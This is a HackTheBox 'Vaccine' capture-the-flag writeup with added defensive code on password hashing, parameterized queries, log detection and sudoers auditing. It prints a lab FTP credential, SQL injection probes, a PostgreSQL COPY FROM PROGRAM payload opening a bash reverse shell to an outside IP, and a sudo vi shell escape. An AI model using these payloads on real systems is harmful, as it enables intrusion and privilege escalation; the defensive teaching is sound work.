HackTheBox - Vaccine Writeup
Box author | MinatoTW
Enumeration
- Top 1000 ports scan
- the result
- All ports scan
- the result
- The result of both scans: open ports
  - 21 / ftp
  - 22 / SSH
  - 80 / http
FTP
- Log in with these credentials: ftpuser:mc@F1l3ZilL4
- These credentials were found on the previous machine, called Oopsie
- Found a file called backup.zip
- Download the zip file
Zip2John
- The zip file is encrypted
- Time to use zip2john
- Direct the output from zip2john into a file called backup.hash
John The Ripper [JtR]
- Use JtR to crack it
- Found the password
Content of the Zip File
- Unzip it and get 2 files, called index.php and style.css
- Found the password in index.php
- It turns out to be an MD5 hash
- Crack it using an online tool
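Why an unsalted MD5 hash sitting in index.php falls to an online lookup, and what the conclusion's advice about passwords looks like in code. This is an added example, not code from the writeup or from the box: the wordlist is a constructed five-entry sample, and the `pbkdf2_sha256$iterations$salt$digest` storage string is my own convention for the demo, not a standard format.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist for the demonstration; real lookup services
# precompute md5() for billions of candidates.
WORDLIST = ["password", "letmein", "qwerty", "welcome1", "sunshine"]


def md5_hex(password: str) -> str:
    """Unsalted MD5, the way the box's index.php stored its password."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_md5(target_hex: str, wordlist=WORDLIST):
    """Reverse an unsalted MD5 by table lookup.

    The digest depends only on the password, so md5(word) can be computed
    once per word and then answered instantly for any hash; that is what
    the online tool the writeup used does at scale.
    """
    table = {md5_hex(word): word for word in wordlist}
    return table.get(target_hex.lower())


def pbkdf2_hash(password: str, salt: bytes = b"", iterations: int = 600_000) -> str:
    """Salted, iterated hash. A fresh random salt per password means no
    precomputed table applies, and the iteration count makes each guess slow."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Storage format is this example's own: algorithm$iterations$salt$digest.
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = md5_hex("qwerty")  # the kind of value found in a config file
    print("md5 lookup ->", lookup_md5(leaked))
    stored = pbkdf2_hash("qwerty")
    print("pbkdf2 verify ->", pbkdf2_verify("qwerty", stored))
    print("same password, different salt ->", pbkdf2_hash("qwerty") != stored)
```

The same lookup against the PBKDF2 output is hopeless: the salt changes the digest for every user, and each verification costs 600,000 HMAC rounds, so a wordlist must be run per stored hash rather than once for everyone.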
The Website
- Log in with the password found in the index.php file
- Assuming this is a database loaded with several cars
- Try inserting ' in the search field; it returns this error
SQLmap
- Here is the syntax. Sqlmap also needs the cookie for this to work
- This server is using a PostgreSQL database
- Sqlmap also found that the vulnerability can lead to UNION SELECT injection
Finding Columns for attack
- Find how many columns there are for the SQL injection attack
- By inserting this into the search field:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
... and so on, until you've found an error.
Python script
- However, I'm kinda lazy. So, I made a python script for it.
- the result
- By looking at this result, we've found 5 columns.
Finding Columns with useful data
- Now we've found 5 columns
- The next payload is gonna use UNION SELECT
- Place a string into each column.
- This is what I'm gonna try:
' UNION SELECT 'a',NULL,NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,NULL,'a'--
- Well, we've found an error at the first column that states:
ERROR: invalid input syntax for integer: "a" LINE 1: ...ect * from cars where name ilike '%' UNION SELECT 'a',NULL,N...
Conversion failed when converting the varchar value 'a' to data type int.
- The rest of them work fine
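The error message above leaks the query shape, `select * from cars where name ilike '%...%'`, with the search term pasted straight into the string. As an added example (my code, not the box's PHP), here is that query rebuilt two ways over an in-memory SQLite table standing in for PostgreSQL (SQLite's LIKE is case-insensitive for ASCII, so it plays the role of ilike). The five-column cars data is constructed. The lone `'` and the `' ORDER BY n--` probes from the sections above only misbehave in the concatenated version; the parameterized version sees each payload as an ordinary search term.

```python
import sqlite3

# Constructed sample rows: five columns, the first an integer, mirroring
# what the UNION probes revealed. Not the box's real data.
ROWS = [
    (1, "Alpha", "Sedan", "Petrol", "1.6L"),
    (2, "Bravo", "Hatchback", "Diesel", "2.0L"),
    (3, "Charlie", "SUV", "Electric", "n/a"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cars (id INTEGER, name TEXT, type TEXT, fuel TEXT, engine TEXT)")
    con.executemany("INSERT INTO cars VALUES (?, ?, ?, ?, ?)", ROWS)
    return con


def search_vulnerable(con, term: str):
    """String concatenation: the user's text is parsed as part of the SQL."""
    sql = "SELECT * FROM cars WHERE name LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, term: str):
    """Bound parameter: the driver passes the text as a value, never as SQL."""
    sql = "SELECT * FROM cars WHERE name LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


def query_errors(con, search_fn, term: str) -> bool:
    """True if the search raises a database error for this input, the
    tell-tale the writeup relied on when it typed a lone ' into the field."""
    try:
        search_fn(con, term)
        return False
    except sqlite3.OperationalError:
        return True


def order_by_leak(con, search_fn, max_cols: int = 10):
    """Replays the ' ORDER BY n-- probes locally. Returns the column count
    when the error/no-error boundary gives it away, or None when every
    probe is treated as a harmless search term."""
    last_ok = None
    for n in range(1, max_cols + 1):
        if query_errors(con, search_fn, f"' ORDER BY {n}--"):
            return last_ok
        last_ok = n
    return None


if __name__ == "__main__":
    con = make_db()
    print("normal search:", search_safe(con, "alp"))
    print("lone quote errors (vulnerable):", query_errors(con, search_vulnerable, "'"))
    print("lone quote errors (safe):", query_errors(con, search_safe, "'"))
    print("ORDER BY leak (vulnerable):", order_by_leak(con, search_vulnerable))
    print("ORDER BY leak (safe):", order_by_leak(con, search_safe))
```

The fix is the one-line change from `search_vulnerable` to `search_safe`; with a bound parameter the database never sees `ORDER BY` or `UNION` as syntax, so the column-counting trick has nothing to measure.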
Foothold/Gaining Access
The Version of database
- Let's get the database version by inserting this in the search field:
' UNION SELECT NULL,VERSION(),NULL,NULL,NULL--
- The result
Exploit
- I found this article: Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest
- Let's try to exploit it by inserting this:
';DROP TABLE IF EXISTS cmd_exec;--
';CREATE TABLE cmd_exec(cmd_output text);--
';COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.16.86/9901 0>&1";'--
Reverse Shell
- Got the reverse shell
- Found ssh key
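Seen from the database side, the whole chain above is visible in PostgreSQL's own statement log. As an added example (my code, not the writeup's), here is a small scanner that flags the three stages, the `UNION SELECT ... VERSION()` probe, the stacked `DROP`/`CREATE TABLE cmd_exec` statements and the `COPY ... FROM PROGRAM`, and groups hits by backend session. The log excerpt is constructed in the shape PostgreSQL writes with `log_statement = 'all'` and the Debian/Ubuntu default `log_line_prefix` of `'%m [%p] %q%u@%d '`; `id` stands in for the reverse-shell command.

```python
import re

# Constructed log excerpt, not a real log from the box. The statements echo
# the probes and payloads in this writeup with 'id' in place of the shell.
SAMPLE_LOG = """\
2024-05-01 10:00:01.001 UTC [2201] postgres@carsdb LOG:  statement: SELECT * from cars where name ilike '%sedan%'
2024-05-01 10:00:05.120 UTC [2201] postgres@carsdb LOG:  statement: SELECT * from cars where name ilike '%' UNION SELECT NULL,VERSION(),NULL,NULL,NULL--%'
2024-05-01 10:00:09.444 UTC [2201] postgres@carsdb LOG:  statement: SELECT * from cars where name ilike '%';DROP TABLE IF EXISTS cmd_exec;--%'
2024-05-01 10:00:09.901 UTC [2201] postgres@carsdb LOG:  statement: SELECT * from cars where name ilike '%';CREATE TABLE cmd_exec(cmd_output text);--%'
2024-05-01 10:00:10.377 UTC [2201] postgres@carsdb LOG:  statement: SELECT * from cars where name ilike '%';COPY cmd_exec FROM PROGRAM 'id';--%'
2024-05-01 10:02:00.000 UTC [2310] app@carsdb LOG:  statement: COPY cars FROM '/tmp/import.csv' CSV
"""

# Assumes the '%m [%p] %q%u@%d ' prefix: timestamp, backend pid, role@database.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)

# One rule per stage of the chain seen in the writeup.
RULES = [
    ("copy_program", re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.I)),
    ("stacked_ddl", re.compile(r";\s*(?:DROP|CREATE)\s+TABLE\b", re.I)),
    ("union_version_probe", re.compile(r"\bUNION\s+SELECT\b.*\bVERSION\s*\(", re.I)),
]


def parse_line(line: str):
    """Splits one log line into its prefix fields and the SQL text, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str):
    """Returns one hit per (line, rule), keeping pid and role so an analyst
    can pivot from the first UNION probe to the COPY that followed it."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["sql"]):
                hits.append({"rule": name, "pid": rec["pid"], "user": rec["user"],
                             "ts": rec["ts"], "sql": rec["sql"]})
    return hits


def hits_per_session(hits):
    """Counts flagged statements per backend pid; several in one session is
    the injection-to-RCE chain, not a stray false positive."""
    counts = {}
    for h in hits:
        counts[h["pid"]] = counts.get(h["pid"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} pid={h['pid']} user={h['user']} rule={h['rule']}: {h['sql'][:80]}")
    print(hits_per_session(found))
```

The benign `COPY cars FROM '/tmp/import.csv'` on the last line is deliberately not matched. Note that `COPY ... FROM PROGRAM` only works for a superuser or a member of `pg_execute_server_program` (PostgreSQL 11 and later), so the real fix is to give the web application a role without that privilege and to use parameterized queries; the log rules are the detection layer on top.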
SSH
- Copy the key and change its permissions with chmod 600
- SSH into the box
- Let's take a look at the website folder /var/www/html
- We've found a lot of files
- First, let's check if there are any users in it by using grep
- Found 2 users exist: admin and postgres
- However, the postgres user has its own password.
- Now we've got the password. Let's check the sudo permissions by typing sudo -l
Privilege Escalation
- Interesting, this user can run vi as sudo on a specific file
- Let's execute it by opening the file with the full path:
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
- Now, press esc and type :!/bin/sh
- Press return
- Source: sudo vi on GTFOBins
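The sudo rule that lets postgres run vi on one file is the kind of entry an audit should catch before someone reads GTFOBins. As an added example (my code, not from the writeup), here is a small sudoers checker that parses plain `user host=(runas) [TAG:] command` lines and flags editors and pagers with built-in shell escapes, suggesting `sudoedit` for the editor case and the `NOEXEC:` tag for the pager case. The sudoers excerpt is constructed; its postgres line matches the command the writeup ran. Aliases, Defaults and line continuations are out of scope for this parser.

```python
import os
import re
import shlex

# Constructed sudoers excerpt (not the box's actual file).
SAMPLE_SUDOERS = """\
# User privilege specification
root     ALL=(ALL:ALL) ALL
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
webadmin ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup   ALL=(ALL) NOPASSWD: /usr/bin/less /var/log/syslog
ops      ALL=(root) sudoedit /etc/hosts
"""

# Programs whose normal feature set includes launching a shell or another
# program. Short, illustrative list; extend it from GTFOBins as needed.
EDITORS = {"vi", "vim", "view", "nano", "emacs", "ed"}
PAGERS = {"less", "more", "man"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text: str):
    """Minimal parser for 'user host=(runas) [TAG:] cmd[, cmd]' lines."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            argv = shlex.split(cmd.strip())
            rules.append({"user": m["user"], "runas": m["runas"],
                          "nopasswd": "NOPASSWD:" in m["tags"], "argv": argv})
    return rules


def audit(rules):
    """Flags rules that hand out a program with a built-in shell escape."""
    findings = []
    for r in rules:
        if not r["argv"]:
            continue
        prog = os.path.basename(r["argv"][0])
        if prog in EDITORS:
            target = r["argv"][1] if len(r["argv"]) > 1 else "<file>"
            advice = f"replace with 'sudoedit {target}' so the editor itself runs unprivileged"
        elif prog in PAGERS:
            advice = "add the NOEXEC: tag, or drop the rule"
        else:
            continue
        findings.append({"user": r["user"], "program": prog,
                         "nopasswd": r["nopasswd"], "advice": advice})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f['user']}: {f['program']} (NOPASSWD={f['nopasswd']}) -> {f['advice']}")
```

`sudoedit` copies the file to a temporary location, runs the editor as the invoking user, and only the final write-back happens as root, which is why `:!/bin/sh` from inside it yields nothing; that is the practical form of the conclusion's "do not mix user commands with root commands".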
Root
- Now, I’m root
- Found the root flag
Conclusion
I've learned a lot today. Make sure to configure the database properly, and please update it. Use long and complicated passwords. DO NOT mix the user's commands with the root commands.
I had a fun time doing this machine and I hope you guys do too. Bye ;)